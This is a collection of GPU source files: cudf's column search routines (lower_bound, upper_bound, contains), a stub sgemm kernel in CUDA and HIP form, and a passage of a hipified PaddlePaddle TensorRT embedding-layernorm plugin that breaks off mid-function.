cudf::type_dispatcher(dict_col.indices().type(), contains_scalar_dispatch{}, dict_col.indices(), *index, stream) : false; } } // namespace namespace detail { bool contains(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { if (col.is_empty()) { return false; } if (not value.is_valid()) { return col.has_nulls(); } return cudf::type_dispatcher(col.type(), contains_scalar_dispatch{}, col, value, stream); } struct multi_contains_dispatch { template <typename Element> std::unique_ptr<column> operator()(column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { std::unique_ptr<column> result = make_numeric_column(data_type{type_to_id<bool>()}, haystack.size(), copy_bitmask(haystack), haystack.null_count(), stream, mr); if (haystack.is_empty()) { return result; } mutable_column_view result_view = result.get()->mutable_view(); if (needles.is_empty()) { thrust::fill(rmm::exec_policy(stream)->on(stream.value()), result_view.begin<bool>(), result_view.end<bool>(), false); return result; } auto hash_set = cudf::detail::unordered_multiset<Element>::create(needles, stream.value()); auto device_hash_set = hash_set.to_device(); auto d_haystack_ptr = column_device_view::create(haystack, stream); auto d_haystack = *d_haystack_ptr; if (haystack.has_nulls()) { thrust::transform(rmm::exec_policy(stream)->on(stream.value()), thrust::make_counting_iterator<size_type>(0), thrust::make_counting_iterator<size_type>(haystack.size()), result_view.begin<bool>(), [device_hash_set, d_haystack] __device__(size_t index) { return d_haystack.is_null_nocheck(index) || device_hash_set.contains(d_haystack.element<Element>(index)); }); } else { thrust::transform(rmm::exec_policy(stream)->on(stream.value()), thrust::make_counting_iterator<size_type>(0), thrust::make_counting_iterator<size_type>(haystack.size()), result_view.begin<bool>(), [device_hash_set, d_haystack] __device__(size_t index) { return device_hash_set.contains(d_haystack.element<Element>(index)); }); } return result; } }; template <> std::unique_ptr<column> multi_contains_dispatch::operator()<list_view>( column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_FAIL("list_view type not supported"); } template <> std::unique_ptr<column> multi_contains_dispatch::operator()<struct_view>( column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_FAIL("struct_view type not supported"); } template <> std::unique_ptr<column> multi_contains_dispatch::operator()<dictionary32>( column_view const& haystack_in, column_view const& needles_in, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { dictionary_column_view const haystack(haystack_in); dictionary_column_view const needles(needles_in); // first combine keys so both dictionaries have the same set auto haystack_matched = dictionary::detail::add_keys(haystack, needles.keys(), stream); auto const haystack_view = dictionary_column_view(haystack_matched->view()); auto needles_matched = dictionary::detail::set_keys(needles, haystack_view.keys(), stream); auto const needles_view = dictionary_column_view(needles_matched->view()); // now just use the indices for the contains column_view const haystack_indices = haystack_view.get_indices_annotated(); column_view const needles_indices = needles_view.get_indices_annotated(); return cudf::type_dispatcher(haystack_indices.type(), 
multi_contains_dispatch{}, haystack_indices, needles_indices, stream, mr); } std::unique_ptr<column> contains(column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_EXPECTS(haystack.type() == needles.type(), "DTYPE mismatch"); return cudf::type_dispatcher( haystack.type(), multi_contains_dispatch{}, haystack, needles, stream, mr); } std::unique_ptr<column> lower_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { return search_ordered(t, values, true, column_order, null_precedence, stream, mr); } std::unique_ptr<column> upper_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { return search_ordered(t, values, false, column_order, null_precedence, stream, mr); } } // namespace detail // external APIs std::unique_ptr<column> lower_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::lower_bound( t, values, column_order, null_precedence, rmm::cuda_stream_default, mr); } std::unique_ptr<column> upper_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::upper_bound( t, values, column_order, null_precedence, rmm::cuda_stream_default, mr); } bool contains(column_view const& col, scalar const& value) { CUDF_FUNC_RANGE(); return detail::contains(col, value, rmm::cuda_stream_default); } std::unique_ptr<column> contains(column_view const& haystack, column_view const& needles, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::contains(haystack, needles, rmm::cuda_stream_default, mr); } } // namespace cudf
cd169086204ff89cc7e65dad9c4a6215e44c324e.cu
/* * Copyright (c) 2019-2020, NVIDIA CORPORATION. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <cudf/column/column_factories.hpp> #include <cudf/detail/iterator.cuh> #include <cudf/detail/nvtx/ranges.hpp> #include <cudf/detail/search.hpp> #include <cudf/dictionary/detail/search.hpp> #include <cudf/dictionary/detail/update_keys.hpp> #include <cudf/scalar/scalar_device_view.cuh> #include <cudf/search.hpp> #include <cudf/table/row_operators.cuh> #include <cudf/table/table_device_view.cuh> #include <cudf/table/table_view.hpp> #include <hash/unordered_multiset.cuh> #include <rmm/cuda_stream_view.hpp> #include <thrust/binary_search.h> namespace cudf { namespace { template <typename DataIterator, typename ValuesIterator, typename OutputIterator, typename Comparator> void launch_search(DataIterator it_data, ValuesIterator it_vals, size_type data_size, size_type values_size, OutputIterator it_output, Comparator comp, bool find_first, rmm::cuda_stream_view stream) { if (find_first) { thrust::lower_bound(rmm::exec_policy(stream)->on(stream.value()), it_data, it_data + data_size, it_vals, it_vals + values_size, it_output, comp); } else { thrust::upper_bound(rmm::exec_policy(stream)->on(stream.value()), it_data, it_data + data_size, it_vals, it_vals + values_size, it_output, comp); } } std::unique_ptr<column> search_ordered(table_view const& t, table_view const& values, bool find_first, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { // Allocate result column std::unique_ptr<column> result = make_numeric_column( data_type{type_to_id<size_type>()}, values.num_rows(), mask_state::UNALLOCATED, stream, mr); mutable_column_view result_view = result.get()->mutable_view(); // Handle empty inputs if (t.num_rows() == 0) { CUDA_TRY(cudaMemsetAsync( result_view.data<size_type>(), 0, values.num_rows() * sizeof(size_type), stream.value())); return result; } if (not column_order.empty()) { CUDF_EXPECTS(static_cast<std::size_t>(t.num_columns()) == column_order.size(), "Mismatch between number of columns and column order."); } if (not null_precedence.empty()) { CUDF_EXPECTS(static_cast<std::size_t>(t.num_columns()) == null_precedence.size(), "Mismatch between number of columns and null precedence."); } // This utility will ensure all corresponding dictionary columns have matching keys. // It will return any new dictionary columns created as well as updated table_views. auto matched = dictionary::detail::match_dictionaries({t, values}, stream); auto d_t = table_device_view::create(matched.second.front(), stream); auto d_values = table_device_view::create(matched.second.back(), stream); auto count_it = thrust::make_counting_iterator<size_type>(0); rmm::device_vector<order> d_column_order(column_order.begin(), column_order.end()); rmm::device_vector<null_order> d_null_precedence(null_precedence.begin(), null_precedence.end()); if (has_nulls(t) or has_nulls(values)) { auto ineq_op = (find_first) ? 
row_lexicographic_comparator<true>( *d_t, *d_values, d_column_order.data().get(), d_null_precedence.data().get()) : row_lexicographic_comparator<true>( *d_values, *d_t, d_column_order.data().get(), d_null_precedence.data().get()); launch_search(count_it, count_it, t.num_rows(), values.num_rows(), result_view.data<size_type>(), ineq_op, find_first, stream); } else { auto ineq_op = (find_first) ? row_lexicographic_comparator<false>( *d_t, *d_values, d_column_order.data().get(), d_null_precedence.data().get()) : row_lexicographic_comparator<false>( *d_values, *d_t, d_column_order.data().get(), d_null_precedence.data().get()); launch_search(count_it, count_it, t.num_rows(), values.num_rows(), result_view.data<size_type>(), ineq_op, find_first, stream); } return result; } struct contains_scalar_dispatch { template <typename Element> bool operator()(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_EXPECTS(col.type() == value.type(), "scalar and column types must match"); using Type = device_storage_type_t<Element>; using ScalarType = cudf::scalar_type_t<Element>; auto d_col = column_device_view::create(col, stream); auto s = static_cast<const ScalarType*>(&value); if (col.has_nulls()) { auto found_iter = thrust::find(rmm::exec_policy(stream)->on(stream.value()), d_col->pair_begin<Type, true>(), d_col->pair_end<Type, true>(), thrust::make_pair(s->value(), true)); return found_iter != d_col->pair_end<Type, true>(); } else { auto found_iter = thrust::find(rmm::exec_policy(stream)->on(stream.value()), // d_col->begin<Type>(), d_col->end<Type>(), s->value()); return found_iter != d_col->end<Type>(); } } }; template <> bool contains_scalar_dispatch::operator()<cudf::list_view>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_FAIL("list_view type not supported yet"); } template <> bool contains_scalar_dispatch::operator()<cudf::struct_view>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { CUDF_FAIL("struct_view type not supported yet"); } template <> bool contains_scalar_dispatch::operator()<cudf::dictionary32>(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { auto dict_col = cudf::dictionary_column_view(col); // first, find the value in the dictionary's key set auto index = cudf::dictionary::detail::get_index(dict_col, value, stream); // if found, check the index is actually in the indices column return index->is_valid() ? 
cudf::type_dispatcher(dict_col.indices().type(), contains_scalar_dispatch{}, dict_col.indices(), *index, stream) : false; } } // namespace namespace detail { bool contains(column_view const& col, scalar const& value, rmm::cuda_stream_view stream) { if (col.is_empty()) { return false; } if (not value.is_valid()) { return col.has_nulls(); } return cudf::type_dispatcher(col.type(), contains_scalar_dispatch{}, col, value, stream); } struct multi_contains_dispatch { template <typename Element> std::unique_ptr<column> operator()(column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { std::unique_ptr<column> result = make_numeric_column(data_type{type_to_id<bool>()}, haystack.size(), copy_bitmask(haystack), haystack.null_count(), stream, mr); if (haystack.is_empty()) { return result; } mutable_column_view result_view = result.get()->mutable_view(); if (needles.is_empty()) { thrust::fill(rmm::exec_policy(stream)->on(stream.value()), result_view.begin<bool>(), result_view.end<bool>(), false); return result; } auto hash_set = cudf::detail::unordered_multiset<Element>::create(needles, stream.value()); auto device_hash_set = hash_set.to_device(); auto d_haystack_ptr = column_device_view::create(haystack, stream); auto d_haystack = *d_haystack_ptr; if (haystack.has_nulls()) { thrust::transform(rmm::exec_policy(stream)->on(stream.value()), thrust::make_counting_iterator<size_type>(0), thrust::make_counting_iterator<size_type>(haystack.size()), result_view.begin<bool>(), [device_hash_set, d_haystack] __device__(size_t index) { return d_haystack.is_null_nocheck(index) || device_hash_set.contains(d_haystack.element<Element>(index)); }); } else { thrust::transform(rmm::exec_policy(stream)->on(stream.value()), thrust::make_counting_iterator<size_type>(0), thrust::make_counting_iterator<size_type>(haystack.size()), result_view.begin<bool>(), [device_hash_set, d_haystack] __device__(size_t index) { return device_hash_set.contains(d_haystack.element<Element>(index)); }); } return result; } }; template <> std::unique_ptr<column> multi_contains_dispatch::operator()<list_view>( column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_FAIL("list_view type not supported"); } template <> std::unique_ptr<column> multi_contains_dispatch::operator()<struct_view>( column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_FAIL("struct_view type not supported"); } template <> std::unique_ptr<column> multi_contains_dispatch::operator()<dictionary32>( column_view const& haystack_in, column_view const& needles_in, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { dictionary_column_view const haystack(haystack_in); dictionary_column_view const needles(needles_in); // first combine keys so both dictionaries have the same set auto haystack_matched = dictionary::detail::add_keys(haystack, needles.keys(), stream); auto const haystack_view = dictionary_column_view(haystack_matched->view()); auto needles_matched = dictionary::detail::set_keys(needles, haystack_view.keys(), stream); auto const needles_view = dictionary_column_view(needles_matched->view()); // now just use the indices for the contains column_view const haystack_indices = haystack_view.get_indices_annotated(); column_view const needles_indices = needles_view.get_indices_annotated(); return cudf::type_dispatcher(haystack_indices.type(), 
multi_contains_dispatch{}, haystack_indices, needles_indices, stream, mr); } std::unique_ptr<column> contains(column_view const& haystack, column_view const& needles, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { CUDF_EXPECTS(haystack.type() == needles.type(), "DTYPE mismatch"); return cudf::type_dispatcher( haystack.type(), multi_contains_dispatch{}, haystack, needles, stream, mr); } std::unique_ptr<column> lower_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { return search_ordered(t, values, true, column_order, null_precedence, stream, mr); } std::unique_ptr<column> upper_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::cuda_stream_view stream, rmm::mr::device_memory_resource* mr) { return search_ordered(t, values, false, column_order, null_precedence, stream, mr); } } // namespace detail // external APIs std::unique_ptr<column> lower_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::lower_bound( t, values, column_order, null_precedence, rmm::cuda_stream_default, mr); } std::unique_ptr<column> upper_bound(table_view const& t, table_view const& values, std::vector<order> const& column_order, std::vector<null_order> const& null_precedence, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::upper_bound( t, values, column_order, null_precedence, rmm::cuda_stream_default, mr); } bool contains(column_view const& col, scalar const& value) { CUDF_FUNC_RANGE(); return detail::contains(col, value, rmm::cuda_stream_default); } std::unique_ptr<column> contains(column_view const& haystack, column_view const& needles, rmm::mr::device_memory_resource* mr) { CUDF_FUNC_RANGE(); return detail::contains(haystack, needles, rmm::cuda_stream_default, mr); } } // namespace cudf
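The public entry points at the bottom of this file (lower_bound, upper_bound, and the two contains overloads) are thin wrappers that forward to the detail implementations on the default stream. A hypothetical caller of lower_bound is sketched below; the table views are assumed to exist already and to be sorted ascending, and the defaulted memory-resource argument is assumed to be supplied by the public header, as is conventional in cudf.

#include <cudf/search.hpp>
#include <cudf/table/table_view.hpp>
#include <memory>
#include <vector>

// `haystack_tv` must be sorted according to `column_order`/`null_precedence`
// for the binary search to be meaningful.
std::unique_ptr<cudf::column> find_insert_points(cudf::table_view const& haystack_tv,
                                                 cudf::table_view const& needles_tv)
{
    std::vector<cudf::order> column_order(haystack_tv.num_columns(), cudf::order::ASCENDING);
    std::vector<cudf::null_order> null_precedence(haystack_tv.num_columns(), cudf::null_order::BEFORE);
    // For each row of needles_tv, returns the first index in haystack_tv at which
    // the row could be inserted without breaking the sort order.
    return cudf::lower_bound(haystack_tv, needles_tv, column_order, null_precedence);
}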
df29a90f2f4a5acf1155073cbfc4534dfbb1c0c2.hip
// !!! This is a file automatically generated by hipify!!!
#include "hip/hip_runtime.h"

extern "C" __global__ void sgemm_tn_vec_128x64(
    float* param_C,
    const float* param_A,
    const float* param_B,
    float param_alpha,
    float param_beta,
    int param_flags,
    int param_lda,
    int param_ldb,
    int param_ldc,
    int param_m,
    int param_n,
    int param_k,
    int param_ldaz,
    int param_ldbz,
    int param_ldcz,
    int param_batch_loops
)
{
    __shared__ float share[128*8*2 + 64*8*2 + 4];
    *param_C = share[0];
}
df29a90f2f4a5acf1155073cbfc4534dfbb1c0c2.cu
extern "C" __global__ void sgemm_tn_vec_128x64( float* param_C, const float* param_A, const float* param_B, float param_alpha, float param_beta, int param_flags, int param_lda, int param_ldb, int param_ldc, int param_m, int param_n, int param_k, int param_ldaz, int param_ldbz, int param_ldcz, int param_batch_loops ) { __shared__ float share[128*8*2 + 64*8*2 + 4]; *param_C = share[0]; }
c16285441bba604609620d24dde7c4709f3457c0.hip
// !!! This is a file automatically generated by hipify!!! // Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved. // SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & // AFFILIATES. All rights reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include "paddle/fluid/inference/tensorrt/plugin/many_emb_layernorm_varseqlen_plugin.h" #include <hip/hip_runtime.h> #include <cstring> #include <vector> #include "NvInfer.h" namespace paddle { namespace inference { namespace tensorrt { namespace plugin { constexpr size_t threadsPerCta128 = 2 * 2 * 32; constexpr size_t threadsPerCta256 = 1 * 4 * 32; constexpr size_t threadsPerCta384 = 1 * 8 * 32; // The number of xmmas in the M dimension. We use one uint32_t per XMMA in the M // dimension: (s + 16*warps_m - 1) / (16*warps_m); constexpr size_t xmmasM128 = 4; constexpr size_t xmmasM256 = 16; constexpr size_t xmmasM384 = 24; // Packed mask size per batch. Layout is XMMAS_M * THREADS_PER_CTA. constexpr size_t packedMaskSize128 = xmmasM128 * threadsPerCta128; constexpr size_t packedMaskSize256 = xmmasM256 * threadsPerCta256; constexpr size_t packedMaskSize384 = xmmasM384 * threadsPerCta384; char const* EMB_LAYER_NORM_VAR_SEQLEN_VERSION_HFACE{"1"}; char const* EMB_LAYER_NORM_VAR_SEQLEN_VERSION_MTRON{"2"}; char const* EMB_LAYER_NORM_VAR_SEQLEN_NAME{ "ManyEmbLayerNormVarlenPluginDynamic"}; // Static class fields initialization nvinfer1::PluginFieldCollection EmbLayerNormVarSeqlenPluginBaseCreator::mFC{}; std::vector<nvinfer1::PluginField> EmbLayerNormVarSeqlenPluginBaseCreator::mPluginAttributes; EmbLayerNormVarSeqlenPluginBase::EmbLayerNormVarSeqlenPluginBase( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : mLayerName(name), mLd(beta.count), mType(type), mIdsEmb_(IdsEmb), nbLookupTables_(static_cast<int>(IdsEmb.size())) { // Assuming Weights.count is the number of elements and not bytes assert(beta.count == gamma.count); mBeta.convertAndCopy(beta, nvinfer1::DataType::kFLOAT); mGamma.convertAndCopy(gamma, nvinfer1::DataType::kFLOAT); copyToDevice(&mGamma, sizeof(float) * mGamma.count, &mGammaDev); copyToDevice(&mBeta, sizeof(float) * mBeta.count, &mBetaDev); for (size_t i = 0; i < mIdsEmb_.size(); ++i) { assert(mIdsEmb_[i].count % mLd == 0); mIdsVocabSize.push_back(int32_t(mIdsEmb_[i].count / mLd)); WeightsWithOwnership tem_weight; tem_weight.convertAndCopy(mIdsEmb_[i], mType); void* cudaMem{nullptr}; PADDLE_ENFORCE_GPU_SUCCESS( hipMalloc(&cudaMem, getWeightsSize(tem_weight, mType))); PADDLE_ENFORCE_GPU_SUCCESS(hipMemcpy(cudaMem, tem_weight.values, getWeightsSize(tem_weight, mType), hipMemcpyHostToDevice)); mIdsEmbPtrs.push_back(cudaMem); } } EmbLayerNormVarSeqlenPluginBase::EmbLayerNormVarSeqlenPluginBase( std::string const& name, void const* data, size_t length) : mLayerName(name), mGammaDev(nullptr), mBetaDev(nullptr), mIdsEmbPtrs{}, mIdsEmb_{} { // Deserialize in the same order as serialization 
deserialize_value(&data, &length, &mType); deserialize_value(&data, &length, &mLd); deserialize_value(&data, &length, &nbLookupTables_); for (int32_t i = 0; i < nbLookupTables_; ++i) { int32_t tem; deserialize_value(&data, &length, &tem); mIdsVocabSize.push_back(tem); } char const* d = static_cast<char const*>(data); mBeta.convertAndCopy(&d, mLd, nvinfer1::DataType::kFLOAT); mGamma.convertAndCopy(&d, mLd, nvinfer1::DataType::kFLOAT); for (int32_t i = 0; i < nbLookupTables_; ++i) { nvinfer1::Weights pre_tem_weight; pre_tem_weight.type = mType; pre_tem_weight.count = mLd * size_t(mIdsVocabSize[i]); const auto nbBytes = mLd * size_t(mIdsVocabSize[i]) * getElementSize(mType); auto destBuf = new char[nbBytes]; pre_tem_weight.values = destBuf; std::copy_n(d, nbBytes, destBuf); d += nbBytes; mIdsEmb_.push_back(pre_tem_weight); } } EmbLayerNormVarSeqlenPluginHFace::EmbLayerNormVarSeqlenPluginHFace( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : EmbLayerNormVarSeqlenPluginBase(name, type, beta, gamma, IdsEmb) {} EmbLayerNormVarSeqlenPluginHFace::EmbLayerNormVarSeqlenPluginHFace( std::string const& name, void const* data, size_t length) : EmbLayerNormVarSeqlenPluginBase(name, data, length) { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace deserialize"); } EmbLayerNormVarSeqlenPluginMTron::EmbLayerNormVarSeqlenPluginMTron( std::string const& name, nvinfer1::DataType const type, nvinfer1::Weights const& beta, nvinfer1::Weights const& gamma, const std::vector<nvinfer1::Weights>& IdsEmb) : EmbLayerNormVarSeqlenPluginBase(name, type, beta, gamma, IdsEmb) {} EmbLayerNormVarSeqlenPluginMTron::EmbLayerNormVarSeqlenPluginMTron( std::string const& name, void const* data, size_t length) : EmbLayerNormVarSeqlenPluginBase(name, data, length) { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron deserialize"); } // IPluginV2DynamicExt Methods nvinfer1::IPluginV2DynamicExt* EmbLayerNormVarSeqlenPluginHFace::clone() const noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace clone"); auto p = new EmbLayerNormVarSeqlenPluginHFace( mLayerName, mType, mBeta, mGamma, mIdsEmb_); p->setPluginNamespace(mNamespace.c_str()); return p; } nvinfer1::IPluginV2DynamicExt* EmbLayerNormVarSeqlenPluginMTron::clone() const noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron clone"); auto p = new EmbLayerNormVarSeqlenPluginMTron( mLayerName, mType, mBeta, mGamma, mIdsEmb_); p->setPluginNamespace(mNamespace.c_str()); return p; } nvinfer1::DimsExprs EmbLayerNormVarSeqlenPluginHFace::getOutputDimensions( int32_t outputIndex, nvinfer1::DimsExprs const* inputs, int32_t nbInputs, nvinfer1::IExprBuilder& exprBuilder) noexcept { for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].nbDims == 1); // seq length assert(inputs[i].nbDims == inputs[1].nbDims); // same shape } assert(inputs[0].nbDims == 1); // pos_id: B+1 if (outputIndex == 0) { nvinfer1::DimsExprs ret; ret.nbDims = 4; ret.d[0] = inputs[1].d[0]; // sum of seq length ret.d[1] = exprBuilder.constant(mLd); ret.d[2] = exprBuilder.constant(1); ret.d[3] = exprBuilder.constant(1); return ret; } else if (outputIndex == 1) { // This is a hack: we just report some mask size and rely the plugins to // play nicely together. // At runtime, depending on the actual maxSeqlen, the size might be // different. 
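// With the constants defined above this reports 2 * packedMaskSize384
// = 2 * 24 * 256 = 12288 half elements per batch; configurePlugin also
// accepts the 128/256 variants (2 * 512 = 1024 and 2 * 2048 = 4096).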
int32_t maskSize_ = packedMaskSize384; auto maskSize = exprBuilder.constant(maskSize_); auto fp16maskSize = exprBuilder.operation(nvinfer1::DimensionOperation::kPROD, *maskSize, *exprBuilder.constant(2)); auto Bplus1 = inputs[0].d[0]; // pos_id auto one = exprBuilder.constant(1); auto B = exprBuilder.operation( nvinfer1::DimensionOperation::kSUB, *Bplus1, *one); nvinfer1::DimsExprs ret; ret.nbDims = 2; ret.d[0] = B; ret.d[1] = fp16maskSize; return ret; } else { nvinfer1::DimsExprs ret; ret.nbDims = 1; ret.d[0] = inputs[nbInputs - 1].d[1]; // mask id: max seqlen return ret; } } nvinfer1::DimsExprs EmbLayerNormVarSeqlenPluginMTron::getOutputDimensions( int32_t outputIndex, nvinfer1::DimsExprs const* inputs, int32_t nbInputs, nvinfer1::IExprBuilder& exprBuilder) noexcept { // Input should be input ids and token ids and cumulative seqlens // Output should be the embeddings tensor and mask indices for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].nbDims == 1); // seq length assert(inputs[i].nbDims == inputs[1].nbDims); // same shape } assert(inputs[0].nbDims == 1); // pos_id: B+1 if (outputIndex == 0 || outputIndex == 1) { nvinfer1::DimsExprs ret; ret.nbDims = 4; ret.d[0] = inputs[1].d[0]; // sum of seq length ret.d[1] = exprBuilder.constant(mLd); ret.d[2] = exprBuilder.constant(1); ret.d[3] = exprBuilder.constant(1); return ret; } else { nvinfer1::DimsExprs ret; ret.nbDims = 1; ret.d[0] = inputs[nbInputs - 1].d[1]; // mask id: max seqlen return ret; } } bool EmbLayerNormVarSeqlenPluginBase::supportsFormatCombination( int32_t pos, nvinfer1::PluginTensorDesc const* inOut, int32_t nbInputs, int32_t nbOutputs) noexcept { assert(nbOutputs == 3); nvinfer1::PluginTensorDesc const& desc = inOut[pos]; if (desc.format != nvinfer1::TensorFormat::kLINEAR) { return false; } if (pos == 0) { // pos_id return desc.dims.nbDims == 1 && desc.type == nvinfer1::DataType::kINT32; } if (pos == 1) { // input_id return desc.dims.nbDims == 1 && desc.type == nvinfer1::DataType::kINT32; } nvinfer1::PluginTensorDesc const& prev = inOut[1]; // input_ids if (1 < pos && pos < (nbInputs - 1)) { // other ids: check it's the same as input_ids return desc.type == prev.type && desc.dims.nbDims == 1 && desc.dims.d[0] == prev.dims.d[0]; } if (pos == nbInputs - 1) { // mask id return desc.type == mType; } // embedded sequence if (pos == nbInputs) { return desc.type == mType && desc.dims.nbDims == 4 && desc.dims.d[0] == inOut[1].dims.d[0] && desc.dims.d[2] == 1 && desc.dims.d[3] == 1; } // mask(HFace) or pre_layernorm_bias(MTron) if (pos == nbInputs + 1) { return desc.type == mType; } // max seqlen if (pos == nbInputs + 2) { return desc.type == mType; } } void checkConfigurationInputs(nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { // Validate input arguments assert(nbOutputs == 3); assert(inputs[0].desc.dims.nbDims == 1); assert(inputs[0].desc.type == nvinfer1::DataType::kINT32); for (int i = 1; i < nbInputs - 1; ++i) { assert(inputs[i].desc.dims.nbDims == 1); assert(inputs[i].desc.dims.d[0] == inputs[1].desc.dims.d[0]); assert(inputs[i].desc.type == nvinfer1::DataType::kINT32); } assert(outputs[0].desc.dims.nbDims == 4); assert(static_cast<size_t>(outputs[0].desc.dims.d[0]) == static_cast<size_t>(inputs[1].desc.dims.d[0])); assert(outputs[0].desc.dims.d[2] == 1); assert(outputs[0].desc.dims.d[3] == 1); } void EmbLayerNormVarSeqlenPluginHFace::configurePlugin( nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, 
nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginHFace configurePlugin"); checkConfigurationInputs(inputs, nbInputs, outputs, nbOutputs); assert(static_cast<size_t>(outputs[0].desc.dims.d[1]) == static_cast<size_t>(mLd)); int32_t const B = inputs[0].desc.dims.d[0] - 1; // check mask assert(outputs[1].desc.dims.nbDims == 2); if (B > 0) { assert(outputs[1].desc.dims.d[0] == B); } assert((outputs[1].desc.dims.d[1] == 2 * packedMaskSize384) || (outputs[1].desc.dims.d[1] == 2 * packedMaskSize128) || (outputs[1].desc.dims.d[1] == 2 * packedMaskSize256)); assert(outputs[0].desc.type == mType); assert(outputs[1].desc.type == nvinfer1::DataType::kHALF); } void EmbLayerNormVarSeqlenPluginMTron::configurePlugin( nvinfer1::DynamicPluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::DynamicPluginTensorDesc const* outputs, int32_t nbOutputs) noexcept { TRANSFORMER_DEBUG_MSG("EmbLayerNormVarSeqlenPluginMTron configurePlugin"); checkConfigurationInputs(inputs, nbInputs, outputs, nbOutputs); assert(static_cast<size_t>(outputs[0].desc.dims.d[1]) == static_cast<size_t>(mLd)); assert(outputs[1].desc.dims.nbDims == 4); assert(static_cast<size_t>(outputs[1].desc.dims.d[0]) == static_cast<size_t>(inputs[1].desc.dims.d[0])); assert(static_cast<size_t>(outputs[1].desc.dims.d[1]) == static_cast<size_t>(mLd)); assert(outputs[1].desc.dims.d[2] == 1); assert(outputs[1].desc.dims.d[3] == 1); assert(outputs[0].desc.type == mType); assert(outputs[1].desc.type == mType); } size_t EmbLayerNormVarSeqlenPluginBase::getWorkspaceSize( nvinfer1::PluginTensorDesc const* inputs, int32_t nbInputs, nvinfer1::PluginTensorDesc const* outputs, int32_t nbOutputs) const noexcept { return 0; } int32_t EmbLayerNormVarSeqlenPluginHFace::enqueue( nvinfer1::PluginTensorDesc const* inputDesc, nvinfer1::PluginTensorDesc const* outputDesc, void const* const* inputs, void* const* outputs, void* workspace, hipStream_t stream) noexcept { int32_t batchSize = inputDesc[0].dims.d[0] - 1; // read out the maximum sequence length from the dummy input int32_t const maxSeqlen = inputDesc[nbLookupTables_].dims.d[0]; int32_t S = 384; if (maxSeqlen <= 128) { S = 128; } else if (maxSeqlen <= 192) { S = 192; } else if (maxSeqlen <= 256) { S = 256; } const float* beta = mBetaDev.get(); const float* gamma = mGammaDev.get(); if (mType == nvinfer1::DataType::kFLOAT) { auto output = static_cast<float*>(outputs[0]); if (nbLookupTables_ == 2) { return 